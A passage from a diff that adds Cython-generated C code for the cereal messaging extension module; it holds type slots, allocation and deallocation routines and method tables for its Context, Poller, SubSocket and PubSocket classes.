/*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9messaging_13messaging_pyx_Context, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9messaging_13messaging_pyx_Context, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Poller(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)o); + p->sub_sockets = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_1__cinit__(o, __pyx_empty_tuple, NULL) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Poller(PyObject *o) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *p = (struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Poller) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_3__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->sub_sockets); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_6cereal_9messaging_13messaging_pyx_Poller(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *p = (struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)o; + if (p->sub_sockets) { + e = (*v)(p->sub_sockets, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_6cereal_9messaging_13messaging_pyx_Poller(PyObject *o) { + PyObject* tmp; + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *p = (struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)o; + tmp = ((PyObject*)p->sub_sockets); + p->sub_sockets = ((PyObject*)Py_None); Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyMethodDef __pyx_methods_6cereal_9messaging_13messaging_pyx_Poller[] = { + {"registerSocket", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_5registerSocket, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"poll", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_7poll, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_9__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_11__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9messaging_13messaging_pyx_Poller_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Poller}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_6cereal_9messaging_13messaging_pyx_Poller}, + {Py_tp_clear, (void *)__pyx_tp_clear_6cereal_9messaging_13messaging_pyx_Poller}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9messaging_13messaging_pyx_Poller}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Poller}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9messaging_13messaging_pyx_Poller_spec = { + "cereal.messaging.messaging_pyx.Poller", + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type_6cereal_9messaging_13messaging_pyx_Poller_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9messaging_13messaging_pyx_Poller = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.messaging.messaging_pyx.""Poller", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Poller, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_6cereal_9messaging_13messaging_pyx_Poller, /*tp_traverse*/ + __pyx_tp_clear_6cereal_9messaging_13messaging_pyx_Poller, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9messaging_13messaging_pyx_Poller, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9messaging_13messaging_pyx_Poller, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_SubSocket __pyx_vtable_6cereal_9messaging_13messaging_pyx_SubSocket; + +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_SubSocket(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)o); + p->__pyx_vtab = __pyx_vtabptr_6cereal_9messaging_13messaging_pyx_SubSocket; + if (unlikely(__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_1__cinit__(o, __pyx_empty_tuple, NULL) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SubSocket(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SubSocket) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_3__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_6cereal_9messaging_13messaging_pyx_SubSocket[] = { + {"connect", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_5connect, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"setTimeout", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_7setTimeout, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"receive", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_9receive, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_11__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_13__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SubSocket}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9messaging_13messaging_pyx_SubSocket}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9messaging_13messaging_pyx_SubSocket}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket_spec = { + "cereal.messaging.messaging_pyx.SubSocket", + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.messaging.messaging_pyx.""SubSocket", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SubSocket, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9messaging_13messaging_pyx_SubSocket, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9messaging_13messaging_pyx_SubSocket, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_PubSocket(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + if (unlikely(__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_1__cinit__(o, __pyx_empty_tuple, NULL) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_PubSocket(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_PubSocket) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_3__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_6cereal_9messaging_13messaging_pyx_PubSocket[] = { + {"connect", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_5connect, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"send", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_7send, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"all_readers_updated", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_9all_readers_updated, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_11__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_13__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_PubSocket}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9messaging_13messaging_pyx_PubSocket}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9messaging_13messaging_pyx_PubSocket}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket_spec = { + "cereal.messaging.messaging_pyx.PubSocket", + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.messaging.messaging_pyx.""PubSocket", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_PubSocket, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9messaging_13messaging_pyx_PubSocket, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9messaging_13messaging_pyx_PubSocket, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_b_, __pyx_k_, sizeof(__pyx_k_), 0, 0, 0, 0}, + {&__pyx_kp_u_, __pyx_k_, sizeof(__pyx_k_), 0, 1, 0, 0}, + {&__pyx_kp_b_127_0_0_1, __pyx_k_127_0_0_1, sizeof(__pyx_k_127_0_0_1), 0, 0, 0, 0}, + {&__pyx_n_s_Context, __pyx_k_Context, sizeof(__pyx_k_Context), 0, 0, 1, 1}, + {&__pyx_n_s_Context___reduce_cython, __pyx_k_Context___reduce_cython, sizeof(__pyx_k_Context___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Context___setstate_cython, __pyx_k_Context___setstate_cython, sizeof(__pyx_k_Context___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Context_term, __pyx_k_Context_term, sizeof(__pyx_k_Context_term), 0, 0, 1, 1}, + {&__pyx_n_s_Event, __pyx_k_Event, sizeof(__pyx_k_Event), 0, 0, 1, 1}, + {&__pyx_n_s_Event___reduce_cython, __pyx_k_Event___reduce_cython, sizeof(__pyx_k_Event___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Event___setstate_cython, __pyx_k_Event___setstate_cython, sizeof(__pyx_k_Event___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Event_clear, __pyx_k_Event_clear, sizeof(__pyx_k_Event_clear), 0, 0, 1, 1}, + {&__pyx_n_s_Event_peek, __pyx_k_Event_peek, sizeof(__pyx_k_Event_peek), 0, 0, 1, 1}, + {&__pyx_n_s_Event_set, __pyx_k_Event_set, sizeof(__pyx_k_Event_set), 0, 0, 1, 1}, + {&__pyx_n_s_Event_wait, __pyx_k_Event_wait, sizeof(__pyx_k_Event_wait), 0, 0, 1, 1}, + {&__pyx_n_s_MessagingError, __pyx_k_MessagingError, sizeof(__pyx_k_MessagingError), 0, 0, 1, 1}, + {&__pyx_n_s_MessagingError___init, __pyx_k_MessagingError___init, sizeof(__pyx_k_MessagingError___init), 0, 0, 1, 1}, + {&__pyx_kp_u_Messaging_failure, __pyx_k_Messaging_failure, sizeof(__pyx_k_Messaging_failure), 0, 1, 0, 0}, + {&__pyx_n_s_MultiplePublishersError, __pyx_k_MultiplePublishersError, sizeof(__pyx_k_MultiplePublishersError), 0, 0, 1, 1}, + {&__pyx_kp_u_None, __pyx_k_None, sizeof(__pyx_k_None), 0, 1, 0, 0}, + {&__pyx_n_s_Poller, __pyx_k_Poller, sizeof(__pyx_k_Poller), 0, 0, 1, 1}, + {&__pyx_n_s_Poller___reduce_cython, __pyx_k_Poller___reduce_cython, sizeof(__pyx_k_Poller___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Poller___setstate_cython, __pyx_k_Poller___setstate_cython, sizeof(__pyx_k_Poller___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Poller_poll, __pyx_k_Poller_poll, sizeof(__pyx_k_Poller_poll), 0, 0, 1, 1}, + {&__pyx_n_s_Poller_registerSocket, __pyx_k_Poller_registerSocket, sizeof(__pyx_k_Poller_registerSocket), 0, 0, 1, 1}, + {&__pyx_n_s_PubSocket, __pyx_k_PubSocket, sizeof(__pyx_k_PubSocket), 0, 0, 1, 1}, + {&__pyx_n_s_PubSocket___reduce_cython, __pyx_k_PubSocket___reduce_cython, sizeof(__pyx_k_PubSocket___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_PubSocket___setstate_cython, __pyx_k_PubSocket___setstate_cython, sizeof(__pyx_k_PubSocket___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_PubSocket_all_readers_updated, __pyx_k_PubSocket_all_readers_updated, sizeof(__pyx_k_PubSocket_all_readers_updated), 0, 0, 1, 1}, + {&__pyx_n_s_PubSocket_connect, __pyx_k_PubSocket_connect, sizeof(__pyx_k_PubSocket_connect), 0, 0, 1, 1}, + {&__pyx_n_s_PubSocket_send, __pyx_k_PubSocket_send, sizeof(__pyx_k_PubSocket_send), 0, 